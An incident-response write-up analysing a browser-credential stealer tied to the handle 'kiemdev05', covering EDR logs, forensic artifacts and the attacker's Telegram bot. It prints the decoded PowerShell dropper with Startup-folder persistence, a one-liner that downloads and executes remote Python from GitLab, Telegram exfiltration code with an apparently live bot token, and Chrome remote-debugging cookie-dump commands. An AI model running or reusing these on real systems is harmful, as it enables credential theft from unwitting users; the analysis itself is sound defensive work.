# Malware kiemdev05
## EDR Log
While reviewing the EDR log I noticed it had caught a program, `synaptics.exe`.
Looking at its behaviour, it spawns many Chrome child processes and connects to many IPs,
and it steals saved passwords from several browsers, packaging them into `C:\Users\admin\AppData\Local\Temp\[TW_<IP>] <ComputerName>.zip`.
1. Runs the Python payload sup02.entrypoint
2. DNS resolution of gitlab.com
3. Connects out
4. Collects Chrome data
5. Creates the files login_db, <ComputerName>, <ComputerName>\All_Passwords.txt
6. Deletes the files login_db, cards_db
7. taskkill chrome.exe
8. Runs Python to start Chrome with remote debugging enabled
9. Modifies Chrome registry keys
10. Repeats the same for Edge ...
11. DNS resolution of adsmanager.facebook.com, graph.facebook.com, mbasic.facebook.com, www.facebook.com
12. Connects out
13. Creates Facebook_Cookies.txt
14. DNS resolution of ip-api.com
15. Creates Temp\[TW_<IP>] <ComputerName>.zip
16. Modifies Temp\[TW_<IP>] <ComputerName>.zip
17. DNS resolution of api.telegram.org
18. Connects out
19. Deletes every file it produced (the txt and zip files)
All of this completes within two minutes of execution.
```
Files created by sup02.entrypoint, in the order of their observed creation times
C:\Users\admin\AppData\Local\Temp\login_db
C:\Users\admin\AppData\Local\Temp\<ComputerName>\All_Passwords.txt
C:\Users\admin\AppData\Local\Temp\<ComputerName>
C:\Users\admin\AppData\Local\Temp\<ComputerName>\Cookies Browser
C:\Users\admin\AppData\Local\Temp\<ComputerName>\Cookies Browser\Chrome_Profile 1.txt
C:\Users\admin\AppData\Local\Temp\<ComputerName>\Cookies Browser\Chrome_Default.txt
C:\Users\admin\AppData\Local\Temp\cards_db
C:\Users\admin\AppData\Local\Temp\<ComputerName>\Cookies Browser\Edge_Default.txt
C:\Users\admin\AppData\Local\Temp\PC-C002292\Facebook_Cookies.txt
C:\Users\admin\AppData\Local\Temp\[TW_<IP>] <ComputerName>.zip
```
```
Outbound connection events from the host, as seen in the EDR log
Direct connections
172.65.251.78:443 gitlab.com
127.0.0.1:9222
31.13.87.1:443
31.13.87.36:443
208.95.112.1:80 ip-api.com
149.154.167.220:443 api.telegram.org
Sites visited through the Chrome instance attached to 127.0.0.1:9222
142.250.198.78:80
142.250.204.35:443
142.250.196.196:443
74.125.204.84:443
142.250.204.42:443
142.250.204.46:443
142.250.77.10:443
142.250.198.78:443
142.250.66.68:443
142.250.198.74:443
142.250.157.188:5228
142.250.196.206:443
142.250.196.195:443
Sites visited through the Edge instance attached to 127.0.0.1:9222
13.107.42.16:443
204.79.197.203:443
13.107.21.239:443
203.69.81.97:443
203.69.81.152:443
20.255.46.225:443
204.79.197.237:443
203.69.81.155:443
204.79.197.203:443
61.220.62.226:443
203.74.95.35:443
210.71.227.123:443
3.169.137.63:443
52.231.230.148:443
104.116.18.28:443
20.42.73.26:443
20.24.121.134:443
104.116.16.155:443
40.104.20.2:443
```
Going back further, explorer.exe is seen running `"C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"`,
launched from a shortcut, `C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk`. The path is under the Startup folder, so it runs at every logon.
## Checking the machine
Connecting to the machine, `C:\Users\Public\ChromeApplication\` contains:
1. a DLLs folder
2. a Lib folder
3. definitions.py
4. python310.dll
5. synaptics.exe
6. vcruntime140.dll
Lib holds the Python standard library.
The command in WindowsSecurity.lnk is `"C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"`.
Checking synaptics.exe shows it is [pythonw.exe](https://www.virustotal.com/gui/file/ff507b25af4b3e43be7e351ec12b483fe46bdbc5656baae6ad0490c20b56e730), version 3.10.11: a renamed copy of the stock interpreter, so the binary itself is benign and the malicious part lives entirely in the command-line argument and the script it downloads.
I also ran [OMENScan/AChoirX: ReWrite of AChoir in Go for Cross Platform](https://github.com/OMENScan/AChoirX) to collect forensic data.
## Further investigation
Looking at https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint,
the main program is obfuscated (base85, then zlib, then marshal, then exec, as its first line shows):
```python
exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode("c%1Cm*|PH5ognzVzu}zY<71~YU3R9OlSzhTNU|hA48c4|3_=1lf}#u11PBcXNq`VTbcC~_>!u^R-XQZb-=d$OE-N~|H*h~fU$yo=$LTD0boUFaO~CpgmZUXn{kQz`M}Oah?^gJB|L6by`V#y&_`ttdpI=|zUW*s&^+zw^_t(qI|Mq_dr|_+AUz8X1MS1=0>tDY7*H>U*U|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|?WiU|`_?r>Pg=m4C6md3||%sUMUNzkPjuS-kLXc|N|``uuxc!n2f5#z*1fd-_TE^qzheKEJ15317XZUkhKqr{4(Qyr(}Be)OJxD}4K&{#f|&d-|R5-Fx~I;V19uPlcbpr+*^+$$R=U;b&p`+4xiQ&xAjFeY^Kp#%J^A!q4CRwecU!UkJZ2e<}R({rfk@pPPRn{KdO}Wc<qfweahAe{1}u`B%bUnSU+(wfQ%~-@G6DvGKR&Z-n2x`#U3I{+;l5@BWDqHDf}|j0<ryAtcPd7yjN%3d#51erlx5w2(G4LdN_D;UB_df1+lUpQ+i+C*@C-Kl`Uo!apiMSN_94y$JtN`GxY!Fol#qSN<YQVdYoKufsH_{H5|&VVYMz|MSn4zy6n3p`iSY^0(m;M9nL|Q47EQAQV+ZExxt2@`-*)MSl1C^78V#@ckluw6>?;eF#OSUcdaQ?5LuruH=Jdsj{aXtnlEEq+&r)<%6Q8K79G)?nL;@k8Md;Ho4W#6y-3-..................
```
Looking at the GitLab project page, there is also a zk.entrypoint,

and this user has created only this one project.

Searching for `kiemdev05` turns up:
1. [StrikeReady Labs on X: "One of our favorite hunts is flagging on language-specific content. Although non-english attacks are not rare, when you combine with prevalence, it can be a good thread. This susp VN actor is targeting in Romanian. Zip drops a pass protected rar, pass is "kiemdev05" https://t.co/aCaNNnHj9s" / X](https://x.com/StrikeReadyLabs/status/1868745455569351087)
This post says the user behind this ID is probably from Vietnam.
2. [Find method to Decompile .NET Core Single File - Exetools](https://forum.exetools.com/showthread.php?p=131221)
The poster in this thread uses the same ID and is in Vietnam.
Googling ["blackhat_code/software"](https://www.google.com/search?q=%22blackhat_code%2Fsoftware%22) finds [Automated Malware Analysis - Joe Sandbox Cloud Basic](https://www.joesandbox.com/analysis/1583800).
Its IoC page lists `WindowsSecurity.lnk`, created by PowerShell, so this is fairly certainly the same malware.

Looking at how it starts, execution begins from [Lakatos, K#U00f6ves and Partners.bat](https://www.virustotal.com/gui/file/a97df6a45e872b0305a87405b0fe1fb2f59fa3c9054ac90202dbc0bc600f2830):
`C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Lakatos, K#U00f6ves and Partners.bat" "`

The contents of Lakatos, K#U00f6ves and Partners.bat (the encoded blob is truncated here):
```
powershell -ep by"pa"ss -w hi"dd"en -enc ZgB1AG4AYwB0AGkAbwBuACAASABpAGQAZQAtAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApACAAewANAAoAI"AAgACAAIAAkAFMAaABvAHcAVwBpAG"...
```
The stray quotes in `by"pa"ss`, `hi"dd"en` and inside the base64 are removed by Windows command-line argument parsing before PowerShell sees them (the process effectively runs `-ep bypass -w hidden -enc ...`), so a rule that matches the literal string `-ep bypass` or the base64 text misses this sample. Removing the quotes and decoding the `-enc` argument (base64 of UTF-16LE) gives:
```
function Hide-ConsoleWindow() {
$ShowWindowAsyncCode = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);'
$ShowWindowAsync = Add-Type -MemberDefinition $ShowWindowAsyncCode -name Win32ShowWindowAsync -namespace Win32Functions -PassThru
$hwnd = (Get-Process -PID $pid).MainWindowHandle
if ($hwnd -ne [System.IntPtr]::Zero) {
$ShowWindowAsync::ShowWindowAsync($hwnd, 0)
} else {
$UniqueWindowTitle = New-Guid
$Host.UI.RawUI.WindowTitle = $UniqueWindowTitle
$StringBuilder = New-Object System.Text.StringBuilder 1024
$TerminalProcess = (Get-Process | Where-Object { $_.MainWindowTitle -eq $UniqueWindowTitle })
$hwnd = $TerminalProcess.MainWindowHandle
if ($hwnd -ne [System.IntPtr]::Zero) {
$ShowWindowAsync::ShowWindowAsync($hwnd, 0)
} else {
Write-Host "Failed to hide the console window."
}
}
}
Hide-ConsoleWindow
$dst = 'C:\Users\Public\ChromeApplication'; Add-Type -AssemblyName System.IO.Compression.FileSystem; if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst }
Document_Secure\rar.exe x Document_Secure\securedoc.rar "C:\Users\Public\ChromeApplication\" -p"kiemdev05"
$s = $payload = "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)";$obj = New-Object -ComObject WScript.Shell;$link = $obj.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk");$link.WindowStyle = 7;$link.TargetPath = "C:\Users\Public\ChromeApplication\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save()
cmd /C start "" "C:\Users\Public\ChromeApplication\synaptics.exe" -c `"$payload`"
```
This script creates C:\Users\Public\ChromeApplication (emptying it first if it already exists) and extracts Document_Secure\securedoc.rar into it with the password `kiemdev05`, using the rar.exe shipped next to it:
```
$dst = 'C:\Users\Public\ChromeApplication';
Add-Type -AssemblyName System.IO.Compression.FileSystem;
if (Test-Path $dst) { Remove-Item -Recurse -Force "$dst\*" } else { New-Item -ItemType Directory -Force $dst }
Document_Secure\rar.exe x Document_Secure\securedoc.rar "C:\Users\Public\ChromeApplication\" -p"kiemdev05"
```
It then creates WindowsSecurity.lnk with the payload as the shortcut's argument, and launches the same payload immediately.
The firewall logs confirm a connection to the Telegram bot right after the shortcut was created.
```
$s = $payload = "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)";
$obj = New-Object -ComObject WScript.Shell;
$link = $obj.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk");
$link.WindowStyle = 7;
$link.TargetPath = "C:\Users\Public\ChromeApplication\synaptics.exe";
$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";
$link.Arguments = "-c `"$payload`"";
$link.Save()
cmd /C start "" "C:\Users\Public\ChromeApplication\synaptics.exe" -c `"$payload`"
```


### Full event flow diagram

## Forensic investigation
From the sections above and below we roughly know how the whole malware operates; I want to find out:
1. Which Telegram account it sends to
2. Whether a loader (an earlier piece of malware) placed these files
3. How the PowerShell payload was executed
4. Who the attacker is
5. Whether password.zip can be recovered
6. Whether Document_Secure\securedoc.rar can be found
7. How the bat got onto the machine and was run
On the machine, WindowsSecurity.lnk shows a creation time of two weeks ago,
and since the machine has been rebooted since then, earlier records are no longer available.
[渗透技巧——Windows下NTFS文件的USN Journal](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E4%B8%8BNTFS%E6%96%87%E4%BB%B6%E7%9A%84USN-Journal)
To see the modification history of files, this article on the USN Journal is a good reference.
Also worth seeing whether `$LogFile` and `$MFT` can be parsed.
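The change journal is the one artifact here that survives a reboot: `$Extend\$UsnJrnl:$J` is on disk, records every create, delete, rename and close per file, and only loses history when its fixed-size circular buffer wraps. The following is an added example, not code from the original write-up, of parsing USN_RECORD_V2 entries and pulling out the timeline for the dropper's file names. The `SAMPLE_JOURNAL` bytes are constructed inline to mimic what the .bat would leave behind; they are not data from the victim host.

```python
# Added example: a minimal parser for NTFS change-journal records (USN_RECORD_V2,
# the format of $Extend\$UsnJrnl:$J). Analyst-side code, not part of the malware
# or of the original write-up. SAMPLE_JOURNAL below is constructed here to mimic
# the dropper's file activity; it is not data from the victim host.
import struct
from datetime import datetime, timedelta, timezone

# RecordLength, MajorVersion, MinorVersion, FileRef, ParentFileRef, Usn,
# TimeStamp (FILETIME), Reason, SourceInfo, SecurityId, FileAttributes,
# FileNameLength, FileNameOffset -> 60-byte fixed header, then UTF-16LE name.
USN_V2_HDR = struct.Struct("<IHHQQQQIIIIHH")

REASONS = {
    0x00000001: "DATA_OVERWRITE",
    0x00000002: "DATA_EXTEND",
    0x00000004: "DATA_TRUNCATION",
    0x00000100: "FILE_CREATE",
    0x00000200: "FILE_DELETE",
    0x00001000: "RENAME_OLD_NAME",
    0x00002000: "RENAME_NEW_NAME",
    0x00008000: "BASIC_INFO_CHANGE",
    0x80000000: "CLOSE",
}

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_dt(ft):
    """FILETIME is 100 ns ticks since 1601-01-01 UTC."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def dt_to_filetime(dt):
    return ((dt - EPOCH_1601) // timedelta(microseconds=1)) * 10


def iter_usn_records(buf):
    """Yield parsed records; skips the zero-filled gaps a sparse $J contains."""
    off = 0
    while off + USN_V2_HDR.size <= len(buf):
        (reclen, major, _minor, fref, pref, usn, ts, reason,
         _src, _sid, _attrs, name_len, name_off) = USN_V2_HDR.unpack_from(buf, off)
        if reclen == 0:          # padding: records are 8-byte aligned
            off += 8
            continue
        if major != 2 or reclen < USN_V2_HDR.size or off + reclen > len(buf):
            break                # unsupported version or corrupt record
        name = buf[off + name_off:off + name_off + name_len].decode("utf-16-le", "replace")
        yield {
            "usn": usn,
            "time": filetime_to_dt(ts),
            "file": name,
            # low 48 bits = MFT record number (pivot into $MFT), high 16 = sequence
            "mft_ref": fref & 0xFFFFFFFFFFFF,
            "parent_ref": pref & 0xFFFFFFFFFFFF,
            "reasons": [n for bit, n in REASONS.items() if reason & bit],
        }
        off += reclen


def timeline_for(buf, needles):
    """All journal entries whose file name contains any of the (case-insensitive) needles."""
    needles = tuple(n.lower() for n in needles)
    return [r for r in iter_usn_records(buf)
            if any(n in r["file"].lower() for n in needles)]


def build_record(usn, when, reason, name, fref, pref=0x500):
    """Build one V2 record; used only to construct the sample journal below."""
    name_b = name.encode("utf-16-le")
    reclen = (USN_V2_HDR.size + len(name_b) + 7) & ~7
    hdr = USN_V2_HDR.pack(reclen, 2, 0, fref, pref, usn, dt_to_filetime(when),
                          reason, 0, 0, 0x20, len(name_b), USN_V2_HDR.size)
    return hdr + name_b + b"\0" * (reclen - len(hdr) - len(name_b))


T0 = datetime(2024, 12, 20, 10, 0, 0, tzinfo=timezone.utc)  # constructed time base
SAMPLE_JOURNAL = b"".join([
    build_record(1000, T0, 0x100, "Lakatos, Köves and Partners.bat", fref=0x2001),
    b"\0" * 16,  # zero gap, as found between pages of a sparse $J
    build_record(1100, T0 + timedelta(seconds=5), 0x100 | 0x2, "securedoc.rar", fref=0x2002),
    build_record(1200, T0 + timedelta(seconds=6), 0x100 | 0x2 | 0x80000000,
                 "WindowsSecurity.lnk", fref=0x2003),
    build_record(1300, T0 + timedelta(seconds=9), 0x200 | 0x80000000,
                 "Lakatos, Köves and Partners.bat", fref=0x2001),
])

if __name__ == "__main__":
    for r in timeline_for(SAMPLE_JOURNAL, ("partners.bat", "securedoc.rar", "windowssecurity.lnk")):
        print(r["time"].isoformat(), r["file"], "+".join(r["reasons"]), hex(r["mft_ref"]))
```

On a live host `fsutil usn readjournal C: csv` dumps the same records; from an image, carve `$Extend\$UsnJrnl:$J` and feed the raw bytes to `iter_usn_records`. The `mft_ref` of a deleted file (the .bat above) is the record number to look up in `$MFT`, where the entry may still hold the original timestamps and parent path even after deletion.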
### LogFile
[jschicht/LogFileParser: Parser for \$LogFile on NTFS](https://github.com/jschicht/LogFileParser) can extract the contents into CSV files for review.
[Free Version](https://www.forensafe.com/free.html) can import all the evtx files for viewing together, but it does not seem able to show the contents of \$LogFile.
### MFT
[kacos2000/MFT_Record_Viewer: \$MFT Record Viewer](https://github.com/kacos2000/MFT_Record_Viewer)
[Master File Table and Computer Forensics](https://www.asdfed.com/Master-File-Table-and-Computer-Forensics)
[Windows Master File Table (MFT) in Digital Forensics — MCSI Library](https://library.mosse-institute.com/articles/2022/05/windows-master-file-table-mft-in-digital-forensics/windows-master-file-table-mft-in-digital-forensics.html)
### LastActivity.csv
This file holds a fairly complete timeline of activity;
it shows boot/shutdown and sleep times, and confirms the machine was indeed rebooted at that point.
### EVTX
[Download LogViewPlus](https://www.logviewplus.com/download.html) is the more convenient option; it can merge all the files into one view.
[NVISOsecurity/evtx-hunter: evtx-hunter helps to quickly spot interesting security-related activity in Windows Event Viewer (EVTX) files.](https://github.com/NVISOsecurity/evtx-hunter/tree/main) can be used for statistics.
The Windows PowerShell log contains the execution record of the PowerShell payload above (Event ID 600, Provider Lifecycle; its HostApplication field keeps the full command line even when script block logging is off), and its time matches the creation time of WindowsSecurity.lnk:
```
Provider "Registry" is Started.
Details:
ProviderName=Registry
NewProviderState=Started
SequenceNumber=1
HostName=ConsoleHost
HostVersion=5.1.19041.5247
HostId=1f132efa-416b-4ce6-b7cf-b48accaa8911
HostApplication=powershell -ep bypass -w hidden -enc ZgB1AG4AYwB0....
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
```
The trail ends here: there are no file-operation logs, and the reboot left the data incomplete.
The creation and execution of the .bat, Document_Secure\securedoc.rar and its command line cannot be found; the earliest trace is the execution of the PowerShell payload.
There may well be an earlier executable that loaded it.
## Memory analysis
Because it uses ordinary Python libraries and deletes the files it produces, memory analysis did not turn up related information.
## sup02.entrypoint analysis
For the details see [kiemdev05 sup02.entrypoint analysis](/m9A7Dg2eRjSIGOOKz4RiLg).
It contains `statut='Không Rõ Trạng Thái'`,
which is Vietnamese for "status unknown", which makes it more certain the code was written by a Vietnamese speaker.
The other file, zk.entrypoint, did not appear on this host but has also been analysed; see [kiemdev05 zk.entrypoint](/LoyT_kubTaiiOxijd9Biug).
### telegram api
The source shows the stolen files being sent out through a Telegram bot (excerpt; `CHAT_ID`, `archive_path` and `message_body` are set elsewhere in the script):
```python
import requests

TOKEN_BOT='7688244721:AAEuVdGvEt2uIYmzQjJmSJX1JKFud9pr1XI'
CHAT_ID_NEW='-1002426006531'
CHAT_ID_RESET='-1002489276039'
with open(archive_path,'rb') as f:
    response=requests.post(
        f"https://api.telegram.org/bot{TOKEN_BOT}/sendDocument",
        params={'chat_id':CHAT_ID, 'caption':message_body, 'protect_content':True, 'disable_web_page_preview':True},
        files={'document':f},
    )
response.raise_for_status()
```
Can anything be pulled back out of the API with this token?
The messages the bot has received can be read with https://api.telegram.org/bot{token}/getUpdates. The `-100…` chat IDs are supergroup/channel IDs, and `protect_content=True` marks the uploads as not forwardable or saveable from Telegram clients.
Trying to gather information through the bot API:
1. [Telegram Bot API](https://core.telegram.org/bots/api#available-methods) relevant methods
2. [GitHub - soxoj/telegram-bot-dumper: 🔪 Dumper & ripper for Telegram bots by token](https://github.com/soxoj/telegram-bot-dumper?tab=readme-ov-file) extracts the information directly and keeps listening for new messages
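Three Bot API properties shape what this can recover: `getUpdates` answers 409 Conflict while a webhook is set on the token, updates are not kept longer than 24 hours, and a bot never receives its own messages, so the zips the stealer posted with `sendDocument` do not come back through `getUpdates`; what does come back is whatever other members post into chats the bot sits in. The following is an added example, not from the original write-up, that triages a `getUpdates` response offline: it lists the chats and senders seen, the documents that could be fetched with `getFile`, and the offset to pass on the next call. The JSON, token and IDs in it are constructed placeholders, not the incident's values.

```python
# Added example (not from the original write-up): offline triage of a Telegram
# Bot API getUpdates response. SAMPLE_UPDATES is constructed to mimic the API's
# JSON shape; the token, chat and user IDs in it are placeholders, not the
# incident's values.
import json

MESSAGE_KEYS = ("message", "edited_message", "channel_post", "edited_channel_post")


def bot_id_from_token(token):
    """A bot token is '<bot user id>:<secret>'; the prefix is the bot's numeric user ID."""
    return int(token.split(":", 1)[0])


def triage_updates(payload):
    """Summarise chats, senders and documents seen by the bot, plus the offset
    to pass on the next getUpdates call so the same updates are not re-read."""
    if not payload.get("ok"):
        # e.g. 409 Conflict: a webhook is set, and getUpdates is refused until it is deleted
        raise ValueError(payload.get("description", "getUpdates failed"))
    chats, users, docs = {}, {}, []
    last_update_id = None
    for upd in payload["result"]:
        last_update_id = upd["update_id"]
        msg = next((upd[k] for k in MESSAGE_KEYS if k in upd), None)
        if msg is None:
            continue  # other update kinds (my_chat_member, callback_query, ...)
        chat = msg["chat"]
        chats[chat["id"]] = (chat["type"], chat.get("title") or chat.get("username"))
        sender = msg.get("from")       # absent for anonymous channel posts
        if sender:
            users[sender["id"]] = sender.get("username") or sender.get("first_name")
        doc = msg.get("document")
        if doc:
            docs.append({"chat_id": chat["id"], "date": msg["date"],
                         "file_name": doc.get("file_name"), "file_id": doc["file_id"],
                         "file_size": doc.get("file_size")})
    return {"chats": chats, "users": users, "documents": docs,
            "next_offset": None if last_update_id is None else last_update_id + 1}


def file_download_url(token, file_path):
    """getFile(file_id) returns file_path; the bytes are then served from this URL
    (the Bot API only serves files up to 20 MB this way)."""
    return f"https://api.telegram.org/file/bot{token}/{file_path}"


# Constructed sample: one supergroup message carrying a document, one private /start.
SAMPLE_UPDATES = json.loads(r'''
{"ok": true, "result": [
  {"update_id": 900000001,
   "message": {"message_id": 41, "date": 1734700000,
     "from": {"id": 111222333, "is_bot": false, "first_name": "op", "username": "example_operator"},
     "chat": {"id": -1001234567890, "type": "supergroup", "title": "Data_Example"},
     "document": {"file_name": "[TW_198.51.100.7] PC-EXAMPLE.zip", "mime_type": "application/zip",
                  "file_id": "BQACAgEAAxkBAAIBexample", "file_unique_id": "AgADexample", "file_size": 48213}}},
  {"update_id": 900000002,
   "message": {"message_id": 7, "date": 1734700100, "text": "/start",
     "from": {"id": 444555666, "is_bot": false, "first_name": "curious"},
     "chat": {"id": 444555666, "type": "private", "first_name": "curious"}}}
]}
''')

if __name__ == "__main__":
    summary = triage_updates(SAMPLE_UPDATES)
    for d in summary["documents"]:
        print(d["chat_id"], d["file_name"], d["file_id"])
    print("next offset:", summary["next_offset"])
```

Pass `next_offset` as `?offset=` on the following call; without it the same batch is returned until it is acknowledged, and with it the acknowledged updates are discarded server-side, which matters if the operator is also polling.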
```
ID: 7688244721
Name: data ve ne
Username: @data_015_bot - https://t.me/data_015_bot
Dumping history from 200 to 0...
Empty messages x4
[5][830655559][2024-12-21 15:41:19+00:00] /start
====================
NEW USER DETECTED: 830655559
First name: None
Last name: None
User has no username
Empty messages x6
[8][6893446818][2024-12-21 18:44:24+00:00] /start
====================
NEW USER DETECTED: 6893446818
First name: supremeo
Last name: rodriguo
Username: @rodriguotavone585353853 - https://t.me/rodriguotavone585353853
Empty messages x8
[11][7063152197][2024-12-24 01:44:39+00:00] /start
====================
NEW USER DETECTED: 7063152197
First name: C0NJURER
Last name: None
Username: @C0NJURERR - https://t.me/C0NJURERR
Saving photo 4902486628019318169...
Empty messages x8
[12][1079398712][2025-01-04 15:57:40+00:00] MessageActionChatAddUser(users=[7688244721])
Empty messages x8
[13][1079398712][2025-01-04 15:58:38+00:00] MessageActionChatMigrateTo(channel_id=2271537412)
Empty messages x8
[14][1079398712][2025-01-04 15:59:17+00:00] MessageActionChatCreate(title='Data_Reset', users=[1079398712, 7688244721])
Empty messages x8
[15][1079398712][2025-01-04 15:59:17+00:00] MessageActionSetMessagesTTL(period=2678400)
Empty messages x8
[16][1079398712][2025-01-04 16:00:07+00:00] MessageActionChatMigrateTo(channel_id=2399198378)
Empty messages x191
Saving history of 830655559 as a text...
Saving history of 6893446818 as a text...
Saving history of 7063152197 as a text...
Saving history of 4761447413 as a text...
Saving history of 4615328488 as a text...
History was fully dumped.
Press Ctrl+C to stop listeting for new messages...
```
Calling `getChatAdministrators` on the group gives:
```
{
"ok": true,
"result": [
{
"user": {
"id": 7688244721,
"is_bot": true,
"first_name": "data ve ne",
"username": "data_015_bot"
},
"status": "administrator",
"can_be_edited": false,
"can_manage_chat": true,
"can_change_info": false,
"can_delete_messages": false,
"can_invite_users": false,
"can_restrict_members": false,
"can_pin_messages": false,
"can_manage_topics": false,
"can_promote_members": false,
"can_manage_video_chats": false,
"can_post_stories": false,
"can_edit_stories": false,
"can_delete_stories": false,
"is_anonymous": false,
"can_manage_voice_chats": false
},
{
"user": {
"id": 1079398712,
"is_bot": false,
"first_name": ".",
"username": "senju822222"
},
"status": "creator",
"is_anonymous": false
}
]
}
```
See also [How We Were Able to Infiltrate Attacker Telegram Bots](https://checkmarx.com/blog/how-we-were-able-to-infiltrate-attacker-telegram-bots/).
## process tree


Besides the traces seen on the machine, this sandbox also recorded other programs:
1. csc.exe
2. cvtres.exe
### csc.exe
[C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe](https://www.virustotal.com/gui/file/4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7)
[Csc | LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/Csc/) describes it as the .NET Framework binary that compiles C# code.
`"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aflg023p\aflg023p.cmdline"`
aflg023p.cmdline is not the C# source itself: it is a compiler response file (passed with `@`, contents shown below), and the source is the `aflg023p.0.cs` it names. This is the normal side effect of the `Add-Type -MemberDefinition` call in Hide-ConsoleWindow: PowerShell writes the C# snippet into a randomly named temp directory and invokes csc.exe (which in turn runs cvtres.exe) to build a throwaway DLL, which is also why System.Management.Automation.dll appears in the reference list.
### cvtres.exe
[C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe](https://www.virustotal.com/gui/file/1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6)
It converts `.res` resource files into Common Object File Format ([COFF](https://en.wikipedia.org/wiki/COFF)) `.obj` object files that the linker can link into the finished `.exe` PE file; csc.exe calls it to build the resource object for the assembly it is compiling.
`C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE1DB.tmp" "c:\Users\user\AppData\Local\Temp\aflg023p\CSCBA3711F82A4D46E8AC7D47C2390FF68.TMP"`
Both are well-known `Living Off the Land Binaries And Scripts`; see [New Tool to Add to Your LOLBAS List: cvtres.exe - SANS Internet Storm Center](https://isc.sans.edu/diary/27892) for the abuse techniques. Here they are spawned by `Add-Type`, so a powershell.exe → csc.exe → cvtres.exe chain writing into `%TEMP%\<random>\` is a useful detection anchor for C# compiled from a script, whether or not the script itself was logged.
### aflg023p.cmdline
```
./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\aflg023p\aflg023p.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\aflg023p\aflg023p.0.cs"
```
### Lakatos, K#U00f6ves and Partners.bat
[MalwareBazaar | Download malware samples](https://bazaar.abuse.ch/download/a97df6a45e872b0305a87405b0fe1fb2f59fa3c9054ac90202dbc0bc600f2830/)
Its content matches what was seen above.

Searching by this bat's hash finds [a97df6a45e872b0305a87405b0fe1fb2f59fa3c9054ac90202dbc0bc600f2830 | Triage](https://tria.ge/250103-r2z4fsskfq/behavioral1)


The random name of the .cmdline file changes on every run.
#### network
This report shows network activity: [a97df6a45e872b0305a87405b0fe1fb2f59fa3c9054ac90202dbc0bc600f2830 | Triage](https://tria.ge/250103-r2z4fsskfq/behavioral2)

but only DNS was recorded.
---
## IoC
The indicators below are only those seen for this malware and on the victim machine.
### Attack commands
1. `powershell -ep bypass -w hidden -enc ZgB1AG4AYwB0....` (in the .bat the switches are written `by"pa"ss` and `hi"dd"en`)
2. `"C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"`
3. `taskkill /F /IM browser.exe`
4. `browser.exe --remote-debugging-port=9222 --restore-lastest-session --user-data-dir={path} --profile-directory={profile} --remote-allow-origins=* --headless --window-size=1,1 --disable-gpu --no-sandbox` (`browser.exe` stands for chrome.exe or msedge.exe; `{path}` and `{profile}` are those of the profile being dumped)
